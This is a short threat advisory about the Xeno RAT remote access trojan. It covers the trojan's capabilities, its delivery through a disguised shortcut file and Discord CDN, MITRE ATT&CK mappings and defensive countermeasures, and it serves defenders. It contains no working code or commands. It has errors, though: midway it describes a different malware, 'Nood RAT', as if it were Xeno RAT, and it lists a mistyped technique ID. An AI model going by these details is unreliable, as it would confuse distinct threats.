Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

Image Credit by Pixabay

VTA-004476 – Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

An intricately crafted remote access trojan (RAT) named Xeno RAT has surfaced on GitHub, offering itself to other parties without charge. Crafted using C# and compatible with Windows 10 and Windows 11, this open-source RAT boasts a wide array of functionalities for remote system management, as per its developer, who identifies as moom825. Its capabilities encompass a SOCKS5 reverse proxy, real-time audio recording, and integration of a concealed virtual network computing (hVNC) module reminiscent of DarkVNC, granting attackers remote entry to compromised computers. According to a recent report by cybersecurity firm Cyfirma, Xeno RAT has been distributed via the Discord content delivery network (CDN), underscoring the growing trend of accessible and cost-free malware driving a surge in RAT-centric campaigns. Cyfirma noted, “The primary transmission method involves a disguised shortcut file posing as a WhatsApp screenshot, functioning as a downloader. This downloader retrieves a ZIP archive from Discord CDN, unpacks it, and executes the subsequent stage payload.” The multi-stage process employs DLL side-loading to initiate a malicious DLL, while concurrently establishing persistence and evading analysis and detection mechanisms. Described as a backdoor malware, Nood RAT is capable of executing commands received from its command and control (C&C) server to carry out nefarious activities, including downloading malicious files, pilfering internal system files, and executing commands. Despite its simplistic appearance, researchers highlight that Nood RAT is equipped with encryption features to circumvent network packet detection and can execute commands from threat actors for various malicious operations.


Attack Surfaces:
Endpoint, Web Application, Web Browser

Command and Control, Defense Evasion, Discovery, Execution, Persistence

T1059.003 – Windows Command Shell,
T1053.005 – Scheduled Task,
T1204.001 – Malicious Link,
T1024.002 – Malicious File,
T1053.005 – Scheduled Task,
T1622 – Debugger Evasion,
T1497 – Virtualization/Sandbox Evasion,
T1055 – Process Injection,
T1622 – Debugger Evasion,
T1497 – Virtualization/Sandbox Evasion,
T1071.001 – Web Protocols,
T1622 – Debugger Evasion,
T1497 – Virtualization/Sandbox Evasion

Indicator of Compromise:


SuperPRO’s Threat Countermeasures Procedures: 
1. Employ threat intelligence measures proactively to counteract the risks posed by the Xeno RAT malware.
2. Utilize robust endpoint security solutions, such as Antimalware security suites and host-based intrusion prevention systems, for real-time monitoring and threat detection to safeguard endpoints.
3. Ensure comprehensive protection against compromise by continuously monitoring network activity using NIDS/NIPS and implementing a web application firewall to filter/block suspicious activities, particularly those involving encrypted payloads.
4. Configure firewalls to prevent outbound communication to known malicious IP addresses and domains associated with Xeno RAT command and control servers.
5. Implement behavior-based monitoring to identify unusual activity patterns, such as suspicious processes attempting unauthorized network connections.
6. Employ application whitelisting to restrict endpoint executions to approved applications, thus preventing unauthorized or malicious executables from running.
7. Regularly conduct vulnerability assessments and penetration testing to identify and address security vulnerabilities, followed by appropriate remediation procedures.
8. Establish baseline security procedures and organizational security policies using security benchmarks.

Contributed by: Zahirul